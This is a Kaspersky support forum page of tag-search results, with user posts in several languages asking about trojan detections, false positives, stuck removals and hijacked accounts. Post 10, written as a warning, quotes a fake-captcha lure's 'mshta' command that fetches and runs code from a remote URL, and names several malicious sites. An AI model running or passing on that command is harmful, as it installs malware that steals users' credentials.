Jump to content
Kaspersky Support Forum

Search the Community

Showing results for tags 'trojan'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • English Forum
    • Products for Home
    • Products for Business
    • KasperskyOS, Development
    • Kaspersky Centers of Expertise
    • Kaspersky Anti-Ransomware Tool
    • Beta Testing Products for Home & Business
  • Русскоязычный форум
    • Продукты для дома
    • Продукты для бизнеса
    • KasperskyOS, Разработка
    • Центры Экспертизы «Лаборатории Касперского»
    • Kaspersky Anti-Ransomware Tool
    • Бета-тестирование продуктов для дома и бизнеса
  • Deutschsprachiges Benutzer-Forum
    • Für Privatanwender
    • Für Unternehmen
  • Forum para usuarios hispanohablantes
    • Para usuarios particulares
    • Para empresas
  • Forum des Utilisateurs Français
    • Pour particuliers
    • Pour les entreprises
  • Fórum Brasileiro
    • Para casa
    • Para PMES e empresas
  • 中文论坛
    • 家用产品支持
    • 企业产品支持
  • Forum in Italiano
    • Utenti privati
    • Aziende
  • Türkçe Forum
    • Ev için
    • İş için
  • Nederlands Gebruikersforum
    • Voor thuis
    • Voor bedrijven
  • Forum Knowledgebase
    • Instructions
    • Advice and solutions
  • Kaspersky Anti Targeted Attack & EDR Expert's Topics

Blogs

There are no results to display.

There are no results to display.

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Found 91 results

  1. Lvdwig
    Je fais ce post car comme mentionné dans le titre je suspecte très fortement un trojan sur mon pc mais je n'ai rien de totalement sûr et j'ai besoin d'aide pour m'aider à fouiller et comprendre si oui on non il y a bien quelque chose. Tout a commencé lorsque kaspersky a détecté un probable trojan "HEUR:Trojan-Downloader.BAT.Bitser.gen" sur un fichier server.bat lorsque j'essaie d'installer un modpack pour un serveur minecraft connu et vérifié. Probable faux positif. J'arrête tout, je désinfecte le fichier suspect, supprime le modpack et run une analyse complète du système qui scan à peu près 3 200 000 fichier et aucune autre détection. Je redémarre et essaie de lancer un ptit scan malwarebytes qui ne donne rien puis je re lance un scan complet kaspersky au cas où. Et là kaspersky n'analyse que 470 000 fichier. Cela ne bouge pas après reboot pc et logiciel alors je réinstalle kaspersky et là tout va bien et re scan plus de 3 000 000 de fichier. Je re démarre et relance un scan pour savoir si kaspersky à bug ou autre et après reboot kaspersky recommence à n'analyse que 470 000 fichier. Comprenant pas ce qu'il se passe je fouille voir si des programmes chelou s'exécute ou autre et rien. Sauf les programmes Memcompression, Secure System et Registry qui selon kaspersky n'ont aucune signature numérique et lorsque je clique dessus j'obtiens le message dans la première image jointe. Je vais dans mon gestionnaire de tâche, je trouve bien les programmes sauf Memcompression et j'arrive à trouver leurs chemin et leurs propriétés et rien de trop suspect mais je ne vois pas Memcompression. Je vais checker sur des forums Microsoft pour des réponses et kaspersky me parle d'une connection SSL êtrange via opéra gx que je bloque et voici le message dans le rapport : "Événement: Une connexion SSL avec un certificat invalide a été détectée message kaspersky : Type d'utilisateur: Non défini Nom de l'application: opera.exe Chemin d'accès à l'application: C:\Users\Patat\AppData\Local\Programs\Opera GX Module: Navigation sécurisée Résultat de description: Bloqué Nom de l'objet: identity.nel.measure.office.net Raison: Ce certificat ou un des certificats de la chaîne a expiré." Je tente un redémarrage mode sans échec mais impossible de me connecter comme sur la 2ème image jointe et tenter de créer mon pin me fait juste un popup Microsoft qui s'éteint directement. Je retourne sur kaspersky et je vois que Memcompression n'est pas actif je sais pas pourquoi et je tente de lancer un scan complet de mon système voir si il y a une différence maintenant et oui je retourne à plus de 3 000 000 en scan mais aucune détection. Dans les rapports kaspersky les dernières utilisation Memcompression, Registry et Secure system, sont incohérente avec leurs utilisation actuel. Il me dit qu'ils sont utilisés pour la dernière le 18mai à 4h05 alors que mon pc s'est éteint à 5h00 et que ça fait 2h que je suis dessus aujourd'hui par exemple. Je trouve ça très inquiétant je lance un sfc scan et windows me dit aucun violation système détecté. Rien de bizarre je crois dans le rapport de tache planifiées suspectes. J'ai tenté d'analysé les connexions réseau actives mais je sais pas trop comment interpréter les résultats mais je crois qu'ils sont suspect. Beaucoup de messages d'impossibilité de lecture, plusieurs canaux LISTENING ou ESTABLISHED et il me semble que mon IP est toujours la même sauf quelques fois mais je ne sais pas si je lis les bonnes colonnes. Bref dans le doute le pc est débranché et hors tension et coupé de tout réseau en attendant. Que dois je penser, que dois je faire ? J'ai vraiment besoin d'aide
  2. Bright625
    Hi I realised that for the past month or so whenever I start my PC, System Watcher detects and blocks CMD under behaviour analysis and marks it as a Trojan. I scanned the system with Kaspersky, Hitman Pro and Malwarebytes but nothing shows up, also checked Autoruns and Task Scheduler as well as Process Explorer for a malicious batch file and I don't see anything out of the ordinary. Is there a way to find out what it could be? Kaspersky isn't giving me much information. Thank you for any help. Windows 10 Version 22H2 (OS Build 19045.5737) Kaspersky Application Version: 21.20.8.505 Event: Blocked Application: Windows Command Processor User: * User type: Initiator Component: System Watcher Result description: Blocked Type: Trojan Name: PDM:Exploit.Win32.Generic Threat level: High Object type: Process Object path: C:\Windows\SysWOW64 Object name: cmd.exe Databases release date: Today, 20/04/2025 07:25:00 MD5: D966DBA31D7B62CAD2DECAE92C5A8D12
  3. Maria_AA
    Saludos. Kaspersky Plus ha detectado varios troyanos en mensajes de correos de hace bastantes años que no están ya en la bandeja de entrada pero si en la carpeta inbox almacenada en el disco duro. Al optar por "resolver" me sale una ventana emergente con omitir como una opción al problema. NI eliminar, ni poner en cuarentena, ni desinfectar... todas ellas opciones que según ayuda de kaspersky deberían ser opciones que apareciesen https://support.kaspersky.com/help/Kaspersky/Win21.20/es-ES/264633.htm Realmente no me interesan para nada esos mensajes ni sus adjuntos. Me gustaría eliminarlos. Pero ¿es omitir realmente la única opción que me puede dar kaspersky? En las imágenes: 1º) el aviso de kaspersky (uno solo de ellos), 2º la ventana resultado con la única opción omitir, 3º la ruta del archivo y por ultimo la localización del mismo en mi disco duro. Si podéis aconsejarme qué hacer, no quiero pulsar"omitir". Gracias
  4. wil2023
    Kaspersky unable to quarantine nor delete HEUR:Trojan-Dropper.AndroidOS.Triada.az on my smartphone. It takes forever to delete, always scanning but not finishing. So I close the app. And when I open it again to scan, it's still there. What should I do? Should I just "Skip"? Is it harmless? Thanks in advance.
  5. Anderson Cristiano
    For some time now, I've noticed that my computer was slower than normal, both when turning on and when performing tasks that I had previously performed without any problems. This week I received an email with a threat stating that my computer was being monitored and that everything I did, including my data, was in the hands of "hackers", so I immediately worried about formatting it to somehow inhibit this and also improve the performance of my computer. But it was still slow and that's not normal for him, I have a Ryzen 5 8600g, 16 GB of RAM, and an A620M Pro RS WiFi motherboard. I hired Kaspersk antivirus and activated it, and I noticed that every time I turn it on, it informs me that these two executables do not have a valid certificate and that they cannot confirm their reliability. Do I still have the virus installed on my machine, even after formatting it? What could I do? I tried to contact support as they provide support on the Plus plan but it is not available
  6. AzusaTFT
    These trojans seems too hard to get rid of. Is it able to remove the trojans?
  7. Nadia C.
    So in my effort to track down the source of a specific HEUR.Trojan.Python.OSPack.gen, I have made a few pastebins and posted a topic about it. I have no idea why Kaspersky is excelling blocking my own topic/resolution attempts, whilst it is incapable of preventing the actual Trojan from being downloaded to my PC? Please advise on how to address Kaspersky's blocking of my own threads so I can actually seek out a solution.
  8. Metin Üzen
    Merhabalar oyun sunucusu kuracakken dosyaları başlattığım zaman virüsler tespit edildi. Tam taramada bir şey çıkmadı fakat sizce silinmiş mi? Yoksa sadece tespit mi edildi. Kaspersky virüs tespiti sonrası benden bilgisayarı yeniden başlatmamı söyledi ve silineceğini söyledi, sizin görüşünüz nedir lütfen yardım edin.
  9. thepurplemirror
    Why is a Un document pdf shown as unsafe and i'm prevented from downloding it , is this a mistake? if yes can any expert explain how can this false positive be triggered . website : https : //documents.un.org/doc/undoc/gen/n24/262/79/pdf/n2426279.pdf# Thank you for any answers .
  10. DPham
    Buen dia comunidad, el jueves 19 a primeras horas de la madrugada mientras buscaba informacion sobre una escuela me tope con esta escuela aqui en Peru : https: //lavictoriagakko.edu.pe (tener cuidado con la web). Dentro de la pagina se mantiene la estructura de una pagina de escuela normal hasta que segundos despues aparece el captcha "no soy un robot" para hacer check en las figuras de autos. Luego de ello aparece un mensaje que que dice que algo asi como "para reiniciar la pagina" presion "Ctrl + r" , pega con "Ctrl + v" este codigo para recargar la pagina, el tema es que me sorprendio que algo ya este listo para pegar y quise ver por que se me habia copiado (en el portapapeles) un ejecutable solo por haber entrado a esa pagina, entonces fui al comando "Ctrl + r" presiono "Ctrl + v" (para visualizar que codigo malicioso era) y de casualidad lo termino ejecutando =( el codigo ejecutado en la ventana run de windows fue: mshta https: //microsoft-dns-reload-6y.pages.dev # "Microsoft Windows: DNS service Reload and Restart UP Tengan cuidado con ello. El problema es que en ese momento solo tenia instalado el windows defender (tengo windows 11 up to date). Algunas horas despues empezo el problema: entraron a mi cuenta de twitter e instagram (ambas con la configuracion de recordar credenciales cada vez que se iniciaba el chrome) , se detecto un inicio de sesion desde CA, USA en mi twitter y eliminaron mi instagram previamente habiendo cambiado el correo asociado a la cuenta por una de dominio @tenaent.com). La computadoraestuvo encendida un par de horas ese luego de la execucion de dicho executable malicioso en el cual use el scaner profundo de windows defender (que no hayo nada raro). Ese dia solo apague la computadora y al dia siguiente adquiri el karpersky premium, el cual arrojo troyanos HEUR:Trojan.Script.Generic (https: //bsc-dataseed1.binance.org https: //microsoft-dns-reload-6y.pages.dev), vinculo malicioso(https: //saaadnesss.shop/check) backdoors como "amenazas", asimismo de en algunos momentos aparecia "shell host is using camara web" pero Karspersky me daba la opcion de bloquear ello. De antemano muchas gracias a quien lea todo esto, cualquier ayuda es bienvenida porque lo que mas me preocupa es saber que informacion han robado en el tiempo que no era detectado.
  11. vandervost
    Версия ОС 21H2 (19044.2130) Версия Касперский 21.19.7.527(b) Через полную проверку нашел пару вредоносных файлов, решил устранить и понял что файлы не удаляются вовсе устранение файлов просто находится в бесконечной загрузке Хотелось бы узнать что с этим можно сделать и как все таки устранить вирусняки помогите плз
  12. WoWchik
    Здравствуйте! Помогите разобраться. На нескольких файловых серверах + контроллерах домена Kaspersky Endpoint Security обнаруживает и стирает программу C:\installed.exe в которой- Trojan.Win32.Fsysna.ezkw. Мне нужно узнать, кто ее рассылает (создать правило в Wireshark например) Подскажите как в базе антивируса найти и достать нужную сигнатуру ??? (Поиск по вирусу в сети не выдает именно по Trojan.Win32.Fsysna.ezkw никакой информации)
  13. mato lechat
    Hello Kaspersky Team and Community, I've been observing the Kaspersky Cyberthreat Live Map for a while now, and I'm a bit puzzled. While the map highlights significant activity globally, I've noticed that Canada often shows minimal threat data compared to many other countries, even during times when cybersecurity risks seem high worldwide. Given the heightened state of cyber activity, this discrepancy is causing me some concern. Could this be due to certain monitoring constraints specific to Canadian infrastructure, or perhaps an intentional choice in data visualization for regions? If this data gap is indicative of low activity, is there something about Canada's cybersecurity landscape that could explain this? Or, should I be worried that it might signal an oversight or lack of reporting that could impact our national security interests? Looking forward to your insights! Thank you. mato lechat
  14. Thi Kim
    Dear Kaspersky Team, I'm experiencing issues with apphost.exe generated from my .NET project: Details: - Kaspersky Premium: 21.19.7.527(a) - File: apphost.exein Debug folder - Detection: HEUR:Trojan.Win32.Sdum.gen - Project link: https : //3jqlnk-my.sharepoint.com/:u:/g/personal/thjvjpxx_3jqlnk_onmicrosoft_com/EeUA7eEi1R9DttooV4MrKTIBgf2AC8TeRxUtOZeaj1RnkA?e=YoDwwJ - IDE: Visual Studio 2022 - Nuget: OpenTK - v4.8.1 OpenTK.GLControl - v4.0.1 Unofficial.laszip.netstandard - v5.5.2 - Framework: .NET 8.0 This file is automatically generated by .NET SDK during project build. I believe this is a false positive because: 1. File is created by Visual Studio/MSBuild 2. Clean source code 3. All dependencies from official NuGet packages Questions: 1. How to confirm this is a false positive? 2. How to report and resolve this issue? 3. How to prevent similar detections? Thank you for your assistance.
  15. Qwp
    Hello, Does anybody know what HEUR:Trojan.Multi.PBot.gen does? Google search leaves no results. Kasperky found it in system memory and removed it, but how to check are there any traces left? Os: Windows 10 home 22h2 (build 19045) Kaspersky total security 21.3 Note that I have python 3.13 installed (if pbot means pythonbot)
  16. пупсик666
    короч, сижу, и вдруг каспер орет что google.exe вирусняк я хз че делать 2 раза было Событие: Обнаружен вредоносный объект Пользователь: я тут не напишу лучше Тип пользователя: Инициатор Имя приложения: chrome.exe Путь к приложению: C:\Program Files\Google\Chrome\Application Компонент: Интернет-защита Описание результата: Обнаружено Тип: Троянское приложение Название: HEUR:Trojan.Script.Generic Точность: Эвристический анализ Степень угрозы: Высокая Тип объекта: Файл Имя объекта: index.php?showtopic=327461 Путь к объекту: https://forum.drweb.com MD5 объекта: 84A15BD1FC9FE77C4192D31DE1604FE9 Причина: Экспертный анализ Дата выпуска баз: Сегодня, 08.11.2024 10:59:00 весь лог жду ответа
  17. Rawkiin
    Уже несколько недель касперский пытается вылечить троян. После лечения и перезагрузки он находит его снова. Также касперский делал 2 принудительных лечения во время которых у меня недоступны запросы в браузере, какие либо приложения виндовс, и по какой то причине перестаёт работать микрофон в дискорде. Почему то не могу найти в отчётах лечения может я просто слепой.
  18. ShadyDian
    Boa noite, me chamo gustavo e estou com um problema que está me estressando muito, a um tempo acabai sofrendo com um programa licenciado por um empresa que no fim, mesmo sendo pago era um malware que acabou vazando dados meus e me deixando bem impotente, dai por recomendação de um amigo assinei o plano da Kaspersky plus. realmente não tive mais problemas com isso, mas em contra partida pouco tempo depois percebi que o celular de minha mãe estava com o e-mail dela alterada e varias coisas da própria área de trabalho do celular dela alteradas. Depois de fazer algumas verificações averiguei que sim era um trojan e que ele tinha roubado bastante dados da minha mãe, além de ter trocado varias senhas e ter tentado entrar nas suas contas bancarias. Como não sou muito bom nesse tipo de problema, para evitar ser mais problemático coloquei um anti vírus no celular dela que encontrou o problema e me livrei dele. Contudo um dia depois meu colega de quarto também foi atacado, perdeu varias contas, discord, redes sociais, steam, recuperamos tudo, contudo não entendemos como isso tinha acontecido, resolvemos, mudamos a rede wi-fi, senha e etc, formatamos o roteador e o computador dele, mas hoje ele foi atacado novamente, ainda pior porque perdeu aceso a uma de suas contas bancarias, sua conta salario. Eu realmente não faço ideia o que posso fazer para acabar com esse problema, estou pensando em formatar simplesmente todos os eletrônicos da rede por medida desesperada, mas eu realmente não faço ideia como resolver e gostaria de alguma orientação. Por hora minha maquina está segura, mas não tenho mais nenhuma noite de sono ficando a espreita, olhando cada notificação, cada mudança com medo de perder algo novamente. Uma coisa que gostaria de acrescentar que as senhas que usamos são feitas pelo próprio edge reconhecidas como senhas fortes, não tem ligação nenhuma com nada nosso, não anotamos ela no dispositivo e a única forma dele de fato acessar é de alguma forma controlando nosso computador. Isso está acontecendo a mais o menos 6 dias. O computador dele eu considero que foi o mais vulnerável pq ele tem um costume de deixar ele sempre ligado, e ligado a rede, por isso imagino que o mesmo está ou estivesse na rede wi-fi. Olhamos alguns fórum e temos receio do hacker estar em nivel kernel de algum dispositivo, já que os anti virus não parecem funcionar para o detectar. No primeiro problema, quando meu colega de quarto foi hackeado, entramos no painel de controle e revogamos acesso a rede de praticamente todos os apps, deixando somente acesso ao sistema do win 11 e apps necessários, excluindo acesso a todos os outros para ter acesso a internet.
  19. goliath760
    Hello, I have a pos software which i run for years without any problems.But, these days, the "HEUR:Trojan.Win32.InversedShelma.gen" is detected in the *.exe file and KP try to delete it. Anyone heard about this trojan.I made a search on the google but nothing ! thanks
  20. testuser
    I tried to explain events via pictures and links. I especially took the screenshots full screen for date and time. Hope it helps. I bought Kaspersky Premium subscription and tested some malwares with it's Real Time Protection feature. I download some samples from known malware sample websites. KP (Kaspersky Premium) is detecting "some" of them while downloading to my computer (i guess because of their HASH'es). BUT i tested some samples which i encountered on the internet and tried to copy to my computer and KP did NOT detect this KNOWN (Virustotal 52/73) malware and other one is KNOWN (Virustotal 48/73) malware. I rescanned these malwares at 21:13 or 21:14 (UTC +3) and still NOT detecting. I am curious is Kaspersky updating their data through Virustotal or NOT? Because first file's first submission date 9 SPT and second file's first submission is 19 AUG. How Kaspersky CAN NOT detect these KNOWN malwares? Can someone (Kaspersky Malware Analysis Team) explain me this situtation? I don't feel safe while using Kaspersky Premium because it doesn't meet my BASIC requirements. If possible may i buy Kaspersky EDR/XDR for home use with low price or big discount? Any help would be appreciated! Thanks in advance. Kind Regards. https://www.virustotal.com/gui/file/020420f20ee32bda982599939e5d4bcffcabd57e22a911f5eeeabf29e4dede7a/detection https://www.virustotal.com/gui/file/d90564f22fc7b04020a55e592056b659edec8e70d9463c77d79bb82bd370fa57/detection
  21. Тимофей227292

    Троян что да как?

    Тимофей227292 posted a topic in Kaspersky Internet Security

    И так я скачал игру(пиратку, не горжусь) и при проверки системы нашло троян. Естественно я сразу подсел на очко(да и щас тоже). Прошел все удаление, перезапуск системы. Но я не уверен что он удалился на 100%, как это можно проверить? прошел быструю проверку ничего не нашло, щас запустил полную. Возможно ли что антивирусник так ошибся и ка точно удалить троян если он остался(мб система не удалило его) Да, мне страшно...
  22. Michal_TO
    My Kaspersky Premium seems to stuck on removing some malware from my PC. It found 80 issues and I clicked to fix them. I did it few hours ago and the program is still "working". It looks like it stuck. I already restarted the system and nothing changed. Also, the program shows constantly: "Removing these objects requires your decision". It did ask me to make some decisions, which were limited to ignoring some of the issues it found. I did so hoping that maybe I will be able to remove it later by myself.
  23. Lenilton Freitas

    Detectado: PDM:Trojan.Win32.Generic;Det

    Lenilton Freitas posted a topic in Para casa

    Recentemente navegando pela Steam encontrei o jogo Visions of Mana e resolvi instalar a demo para jogar. Hoje ao abrir o jogo para minha surpresa o antivirus detectou que havia um vírus nele, fechou o jogo demo antes mesmo de começar e excluiu o arquivo. É até estranho que uma empresa como a Steam permita que esse tipo de coisa aconteça e até denunciei. Mas também, qual seria a possibilidade disso ser apenas um falso positivo?
  24. Kiwis8
    I started FiveM and suddenly Kaspersky detected something called 'PDM: Trojan.Win32.Generic.' It told me to restart the computer and perform a scan, which I did, but nothing was found; it said the system was clean. However, when I entered FiveM again, the same thing happened. Could you please help me?
  25. ChickieHu
    While I was using Windows Subsystem for Android(WSA) today, my kaspersky suddenly told me that itwas a trojan and killed it. I don't know what happened but I'm sure that it's a mistake.After that I tried to reinstall WSA for several times, but the same thing happened again and again. And I also found that when I tried to use files on WIndows(not inside the WSA), the same question will happen ,
×
×
  • Create New...